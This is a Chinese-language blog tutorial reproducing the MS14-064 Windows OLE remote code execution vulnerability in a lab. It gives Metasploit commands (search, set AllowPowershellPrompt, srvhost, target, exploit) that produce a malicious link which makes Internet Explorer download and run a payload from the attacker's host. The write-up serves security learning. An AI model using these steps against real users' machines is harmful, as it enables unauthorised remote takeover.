当前位置: 首页 > news >正文

MS14-064(OLE远程代码执行漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


文章目录

        • 一、原理
        • 二、实验环境
        • 三、漏洞复现

一、原理

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。

二、实验环境

攻击机:kali ip:192.168.204.128
靶机:win10 ip:192.168.204.132
工具kali MSF

三、漏洞复现

1、打开kali 进入MSF框架
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nZbZmCAj-1676102178265)(https://secure2.wostatic.cn/static/nGSGP9xvxeWPQ7hyD8oFDP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aPyT3ajMo5s5J8csGFDXZD-0-37e1c01ea05c3679b7773f43336dfa55#id=u4Eej&originHeight=455&originWidth=889&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

2、找到MS14-064漏洞
search ms14-064
use 0
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dTdlDB6m-1676102178265)(https://secure2.wostatic.cn/static/vSjJ9yzxDyNfdPwairQYmP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aFkaivMPKu4HPLNFsyLmF1-0-7e87130296de71318f687cf7494375f7#id=mooVg&originHeight=386&originWidth=890&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

3、查看当前模块参数
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2TxxsIes-1676102178266)(https://secure2.wostatic.cn/static/wQwFm4ZbUEuJM6PazRot4B/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-4Q8eQFX8TQnueitmCS4e65-0-9deb8ac62a1a0568d71437c851b7982b#id=EuouZ&originHeight=575&originWidth=940&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

4、设置参数
set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ucsooNsR-1676102178267)(https://secure2.wostatic.cn/static/bPcbbRkC1Sp8JRUEo1imcU/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-3xEqkZ3vPJPYsb4js9GXFu-0-9508095ec5c244833b5a376258dcfd50#id=FPvA9&originHeight=97&originWidth=762&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

5、查看和设置可攻击目标
show targets
set targets 1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bfVT54dv-1676102178268)(https://secure2.wostatic.cn/static/7qvxRDsxo5bbgauWhAbMww/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-6w3LecAdKpFTrSz46sT1ky-0-caa4f9f9399c382ffd790c5863a1d396#id=ohp3v&originHeight=158&originWidth=859&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

6、执行获得恶意链接
run
exploit
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NIKyr3k0-1676102178268)(https://secure2.wostatic.cn/static/nXHa5z36vCKCRaHUDZaqwe/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-26yRxSZpbNbJgLbS5KpcPe-0-4ec74a005d1c80fcc954491243056c45#id=hhAX0&originHeight=101&originWidth=682&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

恶意链接:
[http://192.168.204.128:8080/9hA6xv](http://192.168.204.128:8080/9hA6xv)

http://www.lryc.cn/news/2756.html

相关文章:

  • 【C++深陷】之shared_ptr
  • SpringMVC中遇到的错误
  • 姿态估计端到端新方案 | DirectMHP:用于全范围角度2D多人头部姿势估计
  • jvm学习的核心(五)---垃圾回收算法和常见垃圾回收器
  • 亿级高并发电商项目-- 实战篇 --万达商城项目 二(Zookeeper、Docker、Dubbo-Admin等搭建工作
  • 【C#基础】 C# 数据类型总结
  • 格子玻尔兹曼法介绍
  • 活动星投票在时间的河流上造园分组怎么设置如何进行分组报名
  • c#小笔记本-基础
  • DamiCMS SQL注入分析
  • 图傅里叶变换的推导和理解
  • Java八股文(Java面试题)
  • java ssm idea高校图书借阅管理系统设计2z87z
  • 电脑重装系统注册表恢复方法
  • 信道建模(大尺度、小尺度、莱斯衰落、瑞利衰落、莱斯信道、瑞利信道)
  • 2022年12月电子学会Python等级考试试卷(四级)答案解析
  • 通过实例告诉你lua中ipairs到底是怎么遍历的!
  • Axios异步请求 json格式
  • Postgresql源码(100)Portal与事务的关系(顶层事务与子事务)
  • Java、JSP企业快信系统的设计与实现
  • 1.2(完结)C语言进阶易忘点速记
  • 雅思经验(十一)
  • C++中的智能指针
  • LSTM已死,Transformer当立(LSTM is dead. Long Live Transformers! ):下
  • OJ万题详解––[NOIP2004 提高组] 合并果子(C++详解)
  • MySQL-字符集和比较规则
  • 微搭低代码从入门到精通12-网格布局
  • 【c语言】二叉树
  • 六、Java框架之SpringBoot
  • 「Python|环境安装|Windows」如何在Windows上安装Python环境?